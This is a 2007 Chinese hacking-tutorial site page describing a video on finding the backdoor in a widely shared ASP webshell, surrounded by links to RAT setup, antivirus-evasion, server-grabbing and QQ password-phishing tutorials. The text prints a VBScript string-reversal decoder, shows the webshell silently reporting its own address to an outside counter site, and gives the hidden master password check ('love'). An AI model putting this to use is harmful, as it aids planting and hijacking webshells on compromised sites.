基地首页 | 基地文章 | 基地动画 | 基地软件 | 技术论坛 | 会员学院
 
 
热门搜索:安全 安全工具 网络安全 会员培训 安全动画 安全
建站培训网赚动画菜鸟基础教程端口入侵动画3389动画跨站动画入侵实例DDOS攻防
Sniffer嗅探Serv-U动画溢出动画ARP攻防动画灰鸽子教程编程动画破解动画免杀动画
脱壳动画
 动画下载排行
推荐动画第一课超速黑客安全学习法总结
推荐动画第二课入侵必备DOS命令总结
推荐动画第三课x-scan扫描器的使用技巧详
推荐动画第四课明小子检测网站技巧总节
推荐动画第五课网站猎手批量入侵实战演示
推荐动画第六课一步一步教你配置黑防鸽子
推荐动画第七课手把手教你制作穿墙radmin
推荐动画第八课:黑防鸽子隐蔽配置+个性修
推荐动画第九课:最新免杀迷你灰鸽子教程
推荐动画第十课:内网用户鸽子上线方法总结
推荐动画教你抓135肉鸡详细篇
推荐动画WEBSHELL提权综合版教程
推荐动画详细鸽子上线大盘点
推荐动画完全学会135抓及解决扫不到135分
推荐动画3389终端服务替换教程(语音)
推荐动画虚拟机安装教程(语音超详细版)
 您现在的位置: 新世纪网安基地 >> 动画 >> 远控动画 >> 动画信息
教程名称:找出超强webshell使用中ASP的后门
动画大小:0 K
动画语言:12
动画类型:1
运行环境:Win9x/NT/2000/XP/
动画等级:★★★
授权方式:QW
动画添加:admin
下载次数:
本日: 本周:
本月: 总计:
添加时间:2007-5-30 13:40:10
 推荐动画下载
·抓国外5900服务器+工具
·解决一切内网上不了线问题(非映射
·赛特文章管理系统通杀0day(演示)
·教菜鸟到1433机上偷别人的3322上
·轻松得到大量的S5高匿名代理
·(免杀高级)数据段ASCII字符串内存
·6月4日最新过瑞星主动
·无壳pcshare改特征过10大杀软
·利用博客赚钱教程
·突破部分地区宽带限制共享上网
·灰鸽子2008VIP教程(超完美全免杀
·(大猛第五课)菜鸟3389技术突破与
·免杀瑞星杀手(语音)
·完全学会135抓及解决扫不到135分
·最新黑防各个特征码修改方法(过主
·菜鸟系列4完全学S扫描
·(语音)巧妙利用ewebeditor漏洞获
·3389机开启VPN代理详细教程
·黑防隐藏配置技巧和免杀
·差异备份漏洞获得韩国站权限
 最新更新动画
·抓国外5900服务器+工具
·邮件网赚(不投资就赚钱)
·让你的机器快起来
·秒刷QQ空间上万访问更高甚至亿
·网吧EP1433端口关了继续加钱
·网赚之利用广告博客赚钱
·免费申请法国高速VPN
·点击网赚前奏----paypal和AlertP
·详细的虚拟机安装教程
·捆绑上传教程
·详细讲解脱ASPACK的壳
·打造属于自己的鸽子
·免费钓QQ密码
·入侵游戏作弊网站
·菜鸟一天综合检测数百站
·传奇私服合区教程
·XP秘籍2
·解决一切内网上不了线问题(非映射
·打造黑客帝国开机画面
·菜鸟教学之无备份拿站
以下是“找出超强webshell使用中ASP的后门”动画下载地址
全新推出vip经典特色培训课程[点击学习]
  下载地址1
动画介绍

 

今天 给大家做的上抓超强webshell使用中大马的后门,


为了动画的真实性, 先下载,

现在的人不知是怎么想的, 哎, 


等等吧,


整理时间: 2007-5-22 16:09:13

没时间给大家做, 今天抽的一点时间给大家做的, 

好了,  下完了,


垃圾号, 研究技术。群号是:38693995

 

密码就123456吧, 加了密的, 打开,网络嗅探器


http://count24.51yes.com//127.0.0.1%3A81/muma.asp&color=16x&resolution=1024x768&returning=0&language=zh-cn&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%201.1.4322%29


看到没有啊,  //127.0.0.1%3A81/muma.asP 我们的马的地址,


我们来破解它, 

function UnEncode(cc)
for i = 1 to len(cc)
    if mid(cc,i,1)<> "琳" then
temp = Mid(cc, i, 1) + temp
   else
    temp=vbcrlf&temp
 end if
next
UnEncode=temp
end function

这里有一个东东没有被加密

这个就来用来解密的吧, 

http://www.baidu.com/

moc.udiab.www//:ptth""=LRUetiS琳字名门后'


这两面三刀个对比起来你会想到什么,  是不是刚好是倒过来的啊,  哈哈, 

这下子找它的后门就简单了, 


count24 倒过来就是42tnuoc   找一下试试, 

21=ogol&629761642=di?xpsa.kcilc/moc.sey15.42tnuoc//:ptth


倒过来就是http://count24.51yes.com/click.aspx?id=246167926&logo=21 这是一个流量, 我刚才看了的,

 


可是他怎么利用我们的马的地址的呢,  我开始以为是他查入了一句话, 可后来我找了很久没有找出来 可看到它, execute(UnEncode(hu))

这不是一句话哦,  这个就是解密的,  我们先把他解密了不就什么都知道了吧,

我们来试试看,

看, 是不是很熟悉啊,  只能一段一段解啊, 我这由于系统原因, 


好,  解密完了, 我们来看看啊, 


怎么那一个解出来找不到啊,  可能是复制多了系统没有算过来,  这一个是我刚才解密好了的,


他的密码为:love

也就是说这个大马有两个密码,一个是我们自己的, 另一个是他的后门密码love,

if request.form(""pass"")=UserPass or request.form(""pass"")=""love"" then

我们来试试啊, 看能不能进去啊,
看到没, 进去了,  我们再用自己的密码:123456 去试试,

应该能进去的, 慢啊,看到没,进去了, 好了, 教程就是这样,   其它的话我就不多说了,


我有时间了会做一个去后门版的给大家,

相关动画
详细的虚拟机安装教程
抓国外5900服务器+工具
邮件网赚(不投资就赚钱)
让你的机器快起来
秒刷QQ空间上万访问更高甚至亿
 
关于我们 | 加入会员 | 网安商城 | 投稿方法 | 广告报价| 友情连接 | 网站地图 | 网安论坛网安招聘
加入会员咨询QQ:65444425 投稿方法: 广告与合作QQ:9324223

浙ICP备06031184号